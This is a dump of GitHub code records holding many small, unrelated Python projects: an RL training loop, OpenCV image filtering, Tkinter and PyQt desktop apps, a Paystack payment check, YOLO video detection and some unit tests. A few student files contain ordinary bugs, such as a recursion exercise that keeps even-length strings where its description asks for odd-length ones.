variance\n\n# INITIALIZING THE Q-PARAMETERS\nhidden_size = 64\nmax_episodes = 300 # Set total number of episodes to train agent on.\n\n# train\nagent = DQNAgent(\n env, \n# memory_size, \n# batch_size, \n# epsilon_decay,\n)\n\nif __name__ == \"__main__\":\n tf.random.set_seed(336699)\n # 2.5 TRAINING LOOP\n #List to contain all the rewards of all the episodes given to the agent\n scores = []\n \n # EACH EPISODE \n for episode in range(max_episodes):\n ## Reset environment and get first new observation\n state = agent.env.reset()\n episode_reward = 0\n done = False # has the enviroment finished?\n \n states = []\n actions = []\n rewards = []\n \n # EACH TIME STEP \n while not done:\n # for step in range(max_steps): # step index, maximum step is 200\n action = agent.get_action(state)\n \n # TAKING ACTION\n next_state, reward, done, _ = agent.env.step(action)\n \n states.append(state)\n actions.append(action)\n rewards.append(reward)\n \n # Our new state is state\n state = next_state\n \n episode_reward += reward\n\n # if episode ends\n if done:\n scores.append(episode_reward)\n print(\"Episode \" + str(episode+1) + \": \" + str(episode_reward))\n \n states, actions, discnt_rewards = agent.n_step_td_target(states, actions, rewards, 1)\n actor_loss, critic_loss = agent.train_step(states, actions, discnt_rewards) \n break\n\n","repo_name":"RichardMinsooGo-RL-Gym/Bible_4_PI_TF2_A_ActorCritic_Policy_Iterations","sub_path":"TF2_A_PI_43_A2C.py","file_name":"TF2_A_PI_43_A2C.py","file_ext":"py","file_size_in_byte":6973,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"8564518383","text":"import boto3\n#import json to pass our messages in json format\nimport json\nsqs = boto3.resource('sqs')\n#mention the queue name where the message needs to be sent\nqueue = sqs.get_queue_by_name(QueueName='#queuename')\n#pass your message here which should be your job details\n#this can also be variablized. Pass job variables if it has been created\nj_msg = {\n \"created\":\"-\",\n \"group\":groupName,\n \"project\":\"#projectname\",\n \"version\":\"#version\",\n \"environment\":\"#enviromentname\",\n \"job\":\"#jobtotrigger\"\n}\n#multiple messages can be sent which can be treated as multiple triggers\nk_msg = {\n \"created\":\"-\",\n \"group\":groupName,\n \"project\":\"#projectname\",\n \"version\":\"#version\",\n \"environment\":\"#enviromentname\",\n \"job\":\"#jobtotrigger\"\n}\n#A response is generated only if a message is sent\nresponse1 = queue.send_message(MessageBody=json.dumps(j_msg))\nresponse2 = queue.send_message(MessageBody=json.dumps(k_msg))\nprint(response1['MessageId'])\nprint(response2['MessageId'])\n","repo_name":"mmdanas/AWS","sub_path":"SQS/SQS_Trigger_Matillion.py","file_name":"SQS_Trigger_Matillion.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9337621624","text":"#Problema1. Scrivere una funzione ricorsiva che, data una lista L di stringhe, \n# restituisce come risultato una stringa formata dalla concatenazione di tutte le stringhe in L aventi lunghezza dispari.\n# Se la lista non contiene stringhe di lunghezza dispari, la funzione restituisce la stringa vuota.\n\ndef ricorsione(l,s):\n if len(l)==0:\n if s==\"\":\n return False\n else:\n return s\n else:\n if len(l[0])%2==0:\n return ricorsione(l[1:],s+l[0])\n else:\n return ricorsione(l[1:],s)\n \n \nprint(ricorsione([\"ejwb\",\"weuihp\",\"ewruoò\",\"wiohegweifphg\"],\"\"))","repo_name":"davidbelfiori/Foi","sub_path":"eserciziesame/ricorsionees1luglio2018.py","file_name":"ricorsionees1luglio2018.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"27755212337","text":"from ase.data import atomic_masses, atomic_numbers\n\ndef atomic_masses(atoms_object) :\n \"\"\"Returns the sum of the atomic masses for the molecule/elements specified by symbol\n in the config-file. It however does this by looking at the atoms_object and retrieving\n one molecule from one point in the lattice, i.e. it does not look in the config_file.\n This requires the set_tag function of Atoms() to save the size of the super cell\n when the atoms object is created by create_atoms()\"\"\"\n all_masses = atoms_object.get_masses()\n size_cube = atoms_object.get_tags()[0]**3 # Tag should contain the size of super cell\n number_of_atoms = int(len(all_masses) / size_cube) # Number of atoms per molecule\n molecule_masses = all_masses[0:number_of_atoms] #Retrieve masses from one molecule\n\n return sum(molecule_masses)\n","repo_name":"martinclason/Molecular-Dynamics-Project","sub_path":"ale/atomic_masses.py","file_name":"atomic_masses.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32430768496","text":"import cv2\r\nimport numpy as np\r\n# filename='original.png'\r\nfilename='noise.png'\r\nimg = cv2.imread(filename, cv2.IMREAD_GRAYSCALE)\r\ncv2.namedWindow('main')\r\ncv2.imshow('main',img)\r\ncv2.waitKey(0)\r\n\r\n# MEDIAN_FILTER TO REMOVE NOISE FROM IMG\r\n\r\ndef median_filter(noise_img):\r\n final = noise_img[:]\r\n for y in range(len(noise_img)):\r\n for x in range(y):\r\n final[y, x] = noise_img[y, x]\r\n kernel = [noise_img[0, 0]] * 9\r\n for y in range(1, len(noise_img) - 1):\r\n for x in range(1, noise_img.shape[1] - 1):\r\n kernel[0] = noise_img[y - 1, x - 1]\r\n kernel[1] = noise_img[y, x - 1]\r\n kernel[2] = noise_img[y + 1, x - 1]\r\n kernel[3] = noise_img[y - 1, x]\r\n kernel[4] = noise_img[y, x]\r\n kernel[5] = noise_img[y + 1, x]\r\n kernel[6] = noise_img[y - 1, x + 1]\r\n kernel[7] = noise_img[y, x + 1]\r\n kernel[8] = noise_img[y + 1, x + 1]\r\n\r\n kernel.sort()\r\n final[y, x] = kernel[4]\r\n return final\r\n\r\n\r\nblur_img=median_filter(img)\r\ncv2.namedWindow('main2')\r\ncv2.imshow('main2', blur_img) # FINAL=IMG WITHOUT NOISE\r\ncv2.waitKey(0)\r\n# blur_img=cv2.imwrite('C:/Users/Roumk/OneDrive/Υπολογιστής/HW_1', blur_img)\r\n\r\n# CONVERT BLUR_IMG TO BINARY\r\nret,thresh_img = cv2.threshold(blur_img, 20, 255, cv2.THRESH_BINARY)\r\n\r\n# VIEW BINARY IMG\r\ncv2.imshow('threshold',thresh_img)\r\ncv2.waitKey(0)\r\n\r\n# FUNCTION THAT FINDS INTEGRAL\r\ndef my_integral(image):\r\n N = len(image)\r\n M = len(image[0])\r\n array_of_sums = np.empty([N, M], dtype=int)\r\n\r\n for i in range(0, N, 1):\r\n sum = 0\r\n for j in range(0, M, 1):\r\n sum = image[i][j] + sum\r\n array_of_sums[i][j] = sum\r\n\r\n for i in range(1, N, 1):\r\n for j in range(M-1, -1, -1):\r\n array_of_sums[i][j] += array_of_sums[i - 1][j]\r\n\r\n col = np.array([np.zeros(N + 1)])\r\n row = np.array([np.zeros(M)])\r\n row_arr = np.insert(array_of_sums, 0, row, axis=0)\r\n final_arr = np.insert(row_arr, 0, col, axis=1)\r\n\r\n return final_arr\r\n\r\n\r\ndef integral_sum(new_array,si,sj,ei,ej):\r\n sum = new_array[ei, ej] - new_array[ei, sj] - new_array[si, ej] + new_array[si, sj]\r\n return sum\r\n\r\n\r\n\r\n\r\n\r\n# FUNCTION TO RETURN FINAL_IMG\r\ndef connected_components(new_img):\r\n final_img = cv2.cvtColor(blur_img, cv2.COLOR_GRAY2BGR)\r\n item = my_integral(blur_img)\r\n output = cv2.connectedComponentsWithStats(thresh_img, 8, cv2.CV_32S)\r\n num_labels = output[0] # The first cell is the number of labels\r\n labels = output[1] # The second cell is the label matrix\r\n values = output[2] # The third cell is the stat matrix\r\n centroids = output[3] # The fourth cell is the centroid matrix\r\n j=0 # initialize counter\r\n for i in range(1,num_labels):\r\n area=values[i,cv2.CC_STAT_AREA]\r\n\r\n if area>10:\r\n j=j+1 # counter\r\n x1 = values[i, cv2.CC_STAT_LEFT]\r\n y1 = values[i, cv2.CC_STAT_TOP]\r\n w = values[i, cv2.CC_STAT_WIDTH]\r\n h = values[i, cv2.CC_STAT_HEIGHT]\r\n\r\n # CORDINATE FOR BOUNDING BOX\r\n pt1 = (x1, y1)\r\n pt2 = (x1 + w, y1 + h)\r\n (X, Y) = centroids[i]\r\n box_sum=integral_sum(item,y1,x1,y1+h,x1+w)\r\n average=box_sum/(w*h)\r\n # BOUNDING BOXES FOR EACH ELEMENT\r\n color=(0,0,255)\r\n cv2.rectangle(final_img, pt1, pt2, color, 1)\r\n # PUT TEXT IN IMG\r\n\r\n # font = cv2.FONT_HERSHEY_SIMPLEX\r\n font = cv2.FONT_HERSHEY_COMPLEX_SMALL\r\n org = (x1,y1+int(h/2))\r\n fontScale=1\r\n color=(0,0,255)\r\n thickness=1\r\n new_img = cv2.putText(final_img, str(j), org, font, fontScale, color, thickness, cv2.LINE_AA)\r\n # PRINTS\r\n print(f'----Region'f'{j} : ----')\r\n print(f'Area(px)'f':', area)\r\n print(f'Bounding Box Area(px)'f' :', w * h)\r\n print(f'Mean graylevel value in bounding box 'f' :', average)\r\n return new_img\r\n\r\nfinal_img=connected_components(thresh_img)\r\ncv2.imshow('final_img',final_img )\r\ncv2.waitKey(0)\r\npor=cv2.imwrite('noise_final_img.png',final_img)\r\nprint(por)\r\n\r\n\r\n","repo_name":"kostasroumo/ComputersVision_1_denoised","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"22319139363","text":"from tkinter import *\nimport math\n# ---------------------------- CONSTANTS ------------------------------- #\nPINK = \"#e2979c\"\nRED = \"#e7305b\"\nGREEN = \"#9bdeac\"\nYELLOW = \"#f7f5dd\"\nFONT_NAME = \"Courier\"\nWORK_MIN = 25\nSHORT_BREAK_MIN = 5\nLONG_BREAK_MIN = 20\nCHECK_MARK = \"✔\"\nreps = 0\ncheck_mark_multiplier = 1\ntimer = None\n\n# ---------------------------- TIMER RESET ------------------------------- # \n\ndef reset():\n\n global reps\n global check_mark_multiplier\n\n window.after_cancel(timer) # It works but it throws this error on VsCode\n timer_label.config(text=\"Timer\", fg=GREEN)\n canvas.itemconfig(timer_text, text=\"00:00\")\n check.config(text=\"\")\n reps = 0\n check_mark_multiplier = 1\n\n# ---------------------------- TIMER MECHANISM ------------------------------- # \n\ndef start():\n global reps\n\n reps += 1\n\n work_sec = WORK_MIN * 60\n short_break_sec = SHORT_BREAK_MIN * 60\n long_break_sec = LONG_BREAK_MIN * 60\n\n if reps % 8 == 0:\n countdown(long_break_sec)\n timer_label.config(text=\"Break\", fg=RED)\n elif reps % 2 == 0:\n countdown(short_break_sec)\n timer_label.config(text=\"Break\", fg=PINK)\n else:\n countdown(work_sec)\n timer_label.config(text=\"Work\", fg=GREEN)\n\n# ---------------------------- COUNTDOWN MECHANISM ------------------------------- # \n\ndef countdown(count):\n\n global check_mark_multiplier\n\n count_min = math.floor(count / 60)\n\n count_sec = count % 60\n if count_sec < 10:\n count_sec = f\"0{count_sec}\"\n\n canvas.itemconfig(timer_text, text=f\"{count_min}:{count_sec}\")\n if count > 0:\n global timer\n timer = window.after(1000, countdown, count -1)\n else:\n start()\n if reps % 2 == 0:\n check.config(text=f\"{CHECK_MARK*check_mark_multiplier}\")\n check_mark_multiplier += 1\n \n# ---------------------------- UI SETUP ------------------------------- #\n\nwindow = Tk()\nwindow.title(\"Pomodoro\")\nwindow.config(padx=100, pady=50, bg=YELLOW)\n\ntimer_label = Label(text=\"Timer\", fg=GREEN, bg=YELLOW, font=(FONT_NAME, 35, \"bold\"))\ntimer_label.grid(column=1, row=0)\n\ncanvas = Canvas(width=200, height=224, bg=YELLOW, highlightthickness=0)\ntomato_img = PhotoImage(file=\"Udemy/28-day/tomato.png\")\ncanvas.create_image(100, 112, image=tomato_img)\ntimer_text = canvas.create_text(100, 130, text=\"00:00\", fill=\"white\", font=(FONT_NAME, 35, \"bold\"))\ncanvas.grid(column=1, row=1)\n\nstart_button = Button(text=\"Start\", command=start, justify=\"right\")\nstart_button.grid(column=0, row=2)\n\nreset_button = Button(text=\"Reset\", command=reset, justify=\"left\")\nreset_button.grid(column=2, row=2)\n\ncheck = Label(text=\"\", fg=GREEN, bg=YELLOW)\ncheck.grid(column=1, row=3)\n\n\nwindow.mainloop()","repo_name":"Sfrancinelli/Python","sub_path":"Udemy/28-day/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"23178796038","text":"import uimain\nfrom Info import InfoWindow\nfrom db import ControlGSM\nfrom AddEditVehicle import AddEditVehicleWindow\n\nimport sys\nfrom PyQt5 import QtWidgets, QtCore\n\nc = ControlGSM(\"information.db\")\n\nclass App(QtWidgets.QMainWindow, uimain.Ui_MainWindow):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n\n self.treeWidget.itemDoubleClicked.connect(self.openVehicleInfo)\n self.setTypesBox()\n self.vehicleType.currentIndexChanged.connect(self.typeChanged)\n self.typeChanged()\n\n self.addButton.clicked.connect(self.addButtonClick)\n self.editButton.clicked.connect(self.editButtonClick)\n self.delButton.clicked.connect(self.delButtonClick)\n\n def addButtonClick(self):\n self.addForm = AddEditVehicleWindow(self, AddEditVehicleWindow.Add, self.vehicleType.currentData())\n self.addForm.show()\n\n def editButtonClick(self):\n v = self.treeWidget.currentItem()\n if not v:\n return\n self.addForm = AddEditVehicleWindow(self, AddEditVehicleWindow.Edit, vehicle = int(v.text(0)))\n self.addForm.show()\n\n def delButtonClick(self):\n v = self.treeWidget.currentItem()\n if not v:\n return\n if c.isDelete(self, \"эту технику из базы\"):\n if c.delVehicle(int(v.text(0))):\n self.typeChanged()\n else:\n s = QtWidgets.QMessageBox(QtWidgets.QMessageBox.Critical, \"Ошибка\", \"Ошибка\")\n return\n\n def openVehicleInfo(self):\n self.info = InfoWindow(self, int(self.treeWidget.currentItem().text(0)))\n self.info.show()\n\n def typeChanged(self):\n index = self.vehicleType.currentData()\n vehicles = c.getVehicles(index)\n self.treeWidget.clear()\n\n for v in vehicles:\n item = QtWidgets.QTreeWidgetItem(self.treeWidget)\n info = c.vehicleInfo(v[\"ID\"])\n item.setText(0, str(v[\"ID\"]))\n item.setText(1, info[\"Number\"])\n item.setText(2, info[\"Name\"])\n item.setText(3, str(info[\"Mileage\"]))\n item.setText(4, \"%.2f\" % info[\"Oil\"])\n\n for i in range(self.treeWidget.columnCount()):\n self.treeWidget.resizeColumnToContents(i)\n\n def setTypesBox(self):\n items = c.getTypes()\n if items:\n for item in items:\n self.vehicleType.addItem(item['Name'], item['ID'])\n\ndef main():\n try:\n app = QtWidgets.QApplication(sys.argv)\n window = App()\n window.show()\n app.exec_()\n except Exception as err:\n print(\"Error: %s\" % err)\n raise\n\nif __name__ == \"__main__\":\n main()","repo_name":"batuevdm/control-gsm","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20834154450","text":"import requests\nfrom django.conf import settings\n\nclass Paystack():\n def __init__(self,*args,**kwargs):\n\n self.base_url = 'https://api.paystack.co'\n self.SECRET_KEYS = settings.PAYSTACK_SECRET_KEYS \n self.PUBLIC_KEYS = settings.PAYSTACK_PUBLICK_KEYS\n def verify_payment(self,ref,*args,**kwargs):\n path = f'/transaction/verify/{ref}'\n headers = {\n 'Authorization':f\"Bearer {self.SECRET_KEYS}\",\n 'Content-type':'application/json',\n }\n\n url = self.base_url + path\n response = requests.get(url,headers = headers)\n if response.status_code ==200:\n response_data = response.json()\n return response_data['status'],response_data['data']\n response_data = response.json()\n return response_data['status'],response_data['message']","repo_name":"Imotechs/Oma.org","sub_path":"users/paystack.py","file_name":"paystack.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"658067693","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport django\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': ':memory:',\n }\n}\nTIME_ZONE = 'Europe/Berlin'\nLANGUAGE_CODE = 'en-us'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nMEDIA_URL = '/media/'\nSTATIC_URL = '/static/'\nSECRET_KEY = 'test-secret-key'\nROOT_URLCONF = 'tests.urls'\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'taggit',\n 'cosinnus',\n 'cosinnus_note',\n 'tests',\n)\nif django.VERSION[:2] < (1, 6):\n TEST_RUNNER = 'discover_runner.DiscoverRunner'\n","repo_name":"ecobasa/cosinnus-note","sub_path":"tests/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"30980178021","text":"import cv2\r\nfrom ultralytics import YOLO\r\n\r\n# 학습된 모델 파일 경로\r\nmodel_path = 'C:/test/train01/weights/best.pt'\r\n\r\n# Load the YOLOv8 model\r\nmodel = YOLO(model_path)\r\n\r\n# Open the video file\r\nvideo_path = 1\r\ncap = cv2.VideoCapture(video_path)\r\n\r\n# Loop through the video frames\r\nwhile cap.isOpened():\r\n # Read a frame from the video\r\n success, frame = cap.read()\r\n\r\n # 좌우 반전\r\n flipped_frame = cv2.flip(frame, 1)\r\n\r\n if success:\r\n # Run Tomato on the frame\r\n results = model(frame)\r\n\r\n # Visualize the results on the frame\r\n annotated_frame = results[0].plot()\r\n\r\n # Display the annotated frame\r\n cv2.imshow(\"Tomato\", annotated_frame)\r\n\r\n # Set the window property to be always on top\r\n cv2.setWindowProperty(\"Tomato\", cv2.WND_PROP_TOPMOST, 1)\r\n\r\n # Break the loop if 'q' is pressed\r\n if cv2.waitKey(100) & 0xFF == ord(\"q\"):\r\n break\r\n else:\r\n # Break the loop if the end of the video is reached\r\n break\r\n\r\n# Release the video capture object and close the display window\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"leeaemin/github_test","sub_path":"porject/video_test.py","file_name":"video_test.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11000738233","text":"from urllib import request\nfrom project import Project\nimport tomlkit\n\n\nclass ProjectReader:\n def __init__(self, url):\n self._url = url\n\n def get_project(self):\n # tiedoston merkkijonomuotoinen sisältö\n content = request.urlopen(self._url).read().decode(\"utf-8\")\n\n toml_data = tomlkit.parse(content)\n\n poetry_data = toml_data.get(\"tool\").get(\"poetry\")\n\n name = poetry_data.get(\"name\")\n description = poetry_data.get(\"description\")\n license = poetry_data.get(\"license\")\n authors = poetry_data.get(\"authors\")\n\n\n dependencies = []\n dev_dependencies = []\n\n poetry_dependencies = poetry_data.get(\"dependencies\")\n for dep_name, dep_version in poetry_dependencies.items():\n dependencies.append(f\"{dep_name}\")\n\n dev_dependencies_data = poetry_data.get(\"group\").get(\"dev\").get(\"dependencies\")\n for dev_dep_name, dev_dep_version in dev_dependencies_data.items():\n dev_dependencies.append(f\"{dev_dep_name}\")\n\n result = f\"Name: {name}\\nDescription: {description}\\nLicense: {license}\\n\\nAuthors:\"\n for author in authors:\n result += f\"\\n- {author}\"\n\n result += \"\\n\\nDependencies:\"\n for dep in dependencies:\n result += f\"\\n- {dep}\"\n\n result += \"\\n\\nDevelopment dependencies:\"\n for dev_dep in dev_dependencies:\n result += f\"\\n- {dev_dep}\"\n\n return result\n\n\n # deserialisoi TOML-formaatissa oleva merkkijono ja muodosta Project-olio sen tietojen perusteella\n return Project(name, description, dependencies, dev_dependencies)\n","repo_name":"hakkajoe/palautusrepositorio","sub_path":"viikko2/project-reader/src/project_reader.py","file_name":"project_reader.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"40535918815","text":"from tkinter import *\nfrom tkinter import ttk\nfrom poke_api import get_pokemon_info\nfrom tkinter import messagebox\n\n# Create the window\nroot = Tk()\nroot.title(\"Pokémon Info Viewer\")\n# Additional window configuration\nroot.resizable(False, False)\n# Add frames to window\nfrm_top = ttk.Frame(root)\nfrm_top.grid(row=0, column=0, columnspan=2,pady=(20, 10))\n\nfrm_btm_left = ttk.LabelFrame(root, text='Info')\nfrm_btm_left.grid(row=1, column=0, padx=(20, 10), pady=(10, 20), sticky=N)\n\nfrm_btm_right = ttk.LabelFrame(root, text='Stats')\nfrm_btm_right.grid(row=1, column=1, padx=(10, 20), pady=(10, 20))\n\n# Add widgets to frames\n# Populate widget in the top frame\nlbl_name = ttk.Label(frm_top, text='Pokémon name:')\nlbl_name.grid(row=0, column=0, padx=(10, 5), pady=10)\n\nent_name = ttk.Entry(frm_top)\nent_name.grid(row=0, column=1)\n\ndef handle_get_info():\n # get the Pokémon name entered by the user\n poke_name = ent_name.get().strip()\n if len(poke_name) == 0:\n return\n\n # Get the pokemon info from the API\n poke_info = get_pokemon_info(poke_name)\n if poke_info is None:\n error_msg = f'Unable to fetch information for {poke_name.capitalize()} from the PokeAPI.'\n messagebox.showinfo(title='Error', message=error_msg, icon='error')\n return\n\n # check if pokemon has 2 types\n if len(poke_info['types']) == 2:\n type = poke_info['types'][0]['type']['name']+ \", \" + poke_info['types'][1]['type']['name']\n else:\n type = poke_info['types'][0]['type']['name']\n\n # Populkate the info values\n lbl_height_value['text'] = f\"{poke_info['height']} dm\"\n lbl_weight_value['text'] = f\"{poke_info['weight']} hg\"\n lbl_type_value['text'] = f\"{type}\"\n\n # Populate the stats values\n bar_hp['value'] = poke_info['stats'][0]['base_stat']\n bar_attack['value'] = poke_info['stats'][1]['base_stat']\n bar_defense['value'] = poke_info['stats'][2]['base_stat']\n bar_S_attack['value'] = poke_info['stats'][3]['base_stat']\n bar_S_defense['value'] = poke_info['stats'][4]['base_stat']\n bar_speed['value'] = poke_info['stats'][5]['base_stat']\n return\n\nbtn_get_info = ttk.Button(frm_top, text='Get Info', command=handle_get_info)\nbtn_get_info.grid(row=0, column=2, padx=10, pady=10)\n\n# Populate widget in the Info frame\n# Height:\nlbl_height = ttk.Label(frm_btm_left, text='Height:')\nlbl_height.grid(row=0, column=0, sticky=E)\nlbl_height_value = ttk.Label(frm_btm_left, text='TBD')\nlbl_height_value.grid(row=0, column=1)\n# Weight:\nlbl_weight = ttk.Label(frm_btm_left, text='Weight:')\nlbl_weight.grid(row=1, column=0, sticky=E)\nlbl_weight_value = ttk.Label(frm_btm_left, text='TBD')\nlbl_weight_value.grid(row=1, column=1)\n# Type:\nlbl_type = ttk.Label(frm_btm_left, text='Type:')\nlbl_type.grid(row=2, column=0, sticky=E)\nlbl_type_value = ttk.Label(frm_btm_left, text='TBD')\nlbl_type_value.grid(row=2, column=1)\n\n\n# Populate widget in the stats frame\n# Hp:\nlbl_hp = ttk.Label(frm_btm_right, text='HP:')\nlbl_hp.grid(row=0, column=0, sticky=E)\nbar_hp = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_hp.grid(row=0, column=1)\n# Attack:\nlbl_attack = ttk.Label(frm_btm_right, text='Attack:')\nlbl_attack.grid(row=1, column=0, sticky=E)\nbar_attack = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_attack.grid(row=1, column=1)\n# Defence:\nlbl_defense = ttk.Label(frm_btm_right, text='Deffence:')\nlbl_defense.grid(row=2, column=0, sticky=E)\nbar_defense = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_defense.grid(row=2, column=1)\n# Special Attack:\nlbl_S_attack = ttk.Label(frm_btm_right, text='Special Attack:')\nlbl_S_attack.grid(row=3, column=0, sticky=E)\nbar_S_attack = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_S_attack.grid(row=3, column=1)\n# Special Defence:\nlbl_S_defense = ttk.Label(frm_btm_right, text='Special Defence:')\nlbl_S_defense.grid(row=3, column=0, sticky=E)\nbar_S_defense = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_S_defense.grid(row=3, column=1)\n# Speed:\nlbl_speed = ttk.Label(frm_btm_right, text='Speed:')\nlbl_speed.grid(row=4, column=0, sticky=E)\nbar_speed = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_speed.grid(row=4, column=1)\n\n\n\n\n# Loop until window is closed\n\nroot.mainloop()","repo_name":"Agent00Muffin/Lab-9-Poke-Viewer","sub_path":"poke_Info_viewer.py","file_name":"poke_Info_viewer.py","file_ext":"py","file_size_in_byte":4359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"25668643811","text":"\"\"\"\n172. Factorial Trailing Zeroes\nEasy\n\nGiven an integer n, return the number of trailing zeroes in n!.\nExample 1:\n\nInput: 3\nOutput: 0\nExplanation: 3! = 6, no trailing zero.\nExample 2:\n\nInput: 5\nOutput: 1\nExplanation: 5! = 120, one trailing zero.\n\"\"\"\n\n\"\"\"\nTime- log n\n\"\"\"\n\nclass Solution(object):\n def trailingZeroes(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n i=5\n x=n\n res= 0\n while x/i>0:\n res+= x/i\n i*=5\n return res\n","repo_name":"adykumar/DangerWager","sub_path":"Swad/025-172-LC-easy-FactorialTrailingZeroes.py","file_name":"025-172-LC-easy-FactorialTrailingZeroes.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"21865841919","text":"import unittest\nimport robust_regression.utils.integration_utils as iu\nimport numpy as np\n\n\nclass TestIntegrationUtils(unittest.TestCase):\n def test1(self):\n self.assertAlmostEqual(0.0, 0.0)\n\n # def test_output(self):\n # # Test that the output of the function is correct\n # def f(x):\n # return x**2\n\n # mean = 1.0\n # std = 2.0\n # expected_output = np.exp(mean**2) * np.sum(iu.w_ge * f(np.sqrt(2) * std * iu.x_ge + mean))\n\n # # Note: we cannot use @njit-ed function in assertAlmostEqual,\n # # thus, we test np.isclose for the expected output and the function output\n # self.assertTrue(np.isclose(iu.gauss_hermite_quadrature(f, mean, std), expected_output))\n\n # def test_error_raised(self):\n # # Test that an error is raised if the input function does not return a scalar\n # def f(x):\n # return np.array([x**2, x**3])\n\n # mean = 1.0\n # std = 2.0\n # with self.assertRaises(ValueError):\n # iu.gauss_hermite_quadrature(f, mean, std)\n\n # def test_valid_input(self):\n # # Test that the function executes without errors for valid input values\n # def f(x):\n # return np.exp(-x**2)\n\n # mean = 0.0\n # std = 1.0\n # iu.gauss_hermite_quadrature(f, mean, std) # Should not raise an error\n\n\nclass TestDivideIntegrationBordersMultipleGrid(unittest.TestCase):\n def test_N_equals_0(self):\n square_borders = [(-1, 1), (-1, 1)]\n N = 0\n with self.assertRaises(ValueError):\n iu.divide_integration_borders_multiple_grid(square_borders, N)\n\n def test_N_equals_1(self):\n square_borders = [(-1, 1), (-1, 1)]\n N = 1\n domain_x, domain_y = iu.divide_integration_borders_multiple_grid(square_borders, N)\n expected_domain_x = [[-1.0, 1.0]]\n expected_domain_y = [[-1.0, 1.0]]\n self.assertEqual(domain_x, expected_domain_x)\n self.assertEqual(domain_y, expected_domain_y)\n\n def test_N_greater_than_1(self):\n square_borders = [(-1, 1), (-1, 1)]\n N = 4\n domain_x, domain_y = iu.divide_integration_borders_multiple_grid(square_borders, N)\n expected_domain_x = [\n [-1.0, -0.5],\n [-1.0, -0.5],\n [-1.0, -0.5],\n [-1.0, -0.5],\n [-0.5, 0.0],\n [-0.5, 0.0],\n [-0.5, 0.0],\n [-0.5, 0.0],\n [0.0, 0.5],\n [0.0, 0.5],\n [0.0, 0.5],\n [0.0, 0.5],\n [0.5, 1.0],\n [0.5, 1.0],\n [0.5, 1.0],\n [0.5, 1.0],\n ]\n expected_domain_y = [\n [-1.0, -0.5],\n [-0.5, 0.0],\n [0.0, 0.5],\n [0.5, 1.0],\n [-1.0, -0.5],\n [-0.5, 0.0],\n [0.0, 0.5],\n [0.5, 1.0],\n [-1.0, -0.5],\n [-0.5, 0.0],\n [0.0, 0.5],\n [0.5, 1.0],\n [-1.0, -0.5],\n [-0.5, 0.0],\n [0.0, 0.5],\n [0.5, 1.0],\n ]\n self.assertEqual(len(domain_x), len(expected_domain_x))\n self.assertEqual(len(domain_y), len(expected_domain_y))\n\n self.assertEqual(domain_x, expected_domain_x)\n self.assertEqual(domain_y, expected_domain_y)\n\n def test_N_max_range_zero(self):\n square_borders = [(0, 0), (0, 0)]\n N = 3\n domain_x, domain_y = iu.divide_integration_borders_multiple_grid(square_borders, N)\n expected_domain_x = [\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n ]\n expected_domain_y = [\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n ]\n self.assertEqual(domain_x, expected_domain_x)\n self.assertEqual(domain_y, expected_domain_y)\n\n def test_N_max_range_negative(self):\n square_borders = [(-1, 1), (-1, 1)]\n N = 10\n domain_x, domain_y = iu.divide_integration_borders_multiple_grid(square_borders, N)\n for sublist in domain_x + domain_y:\n 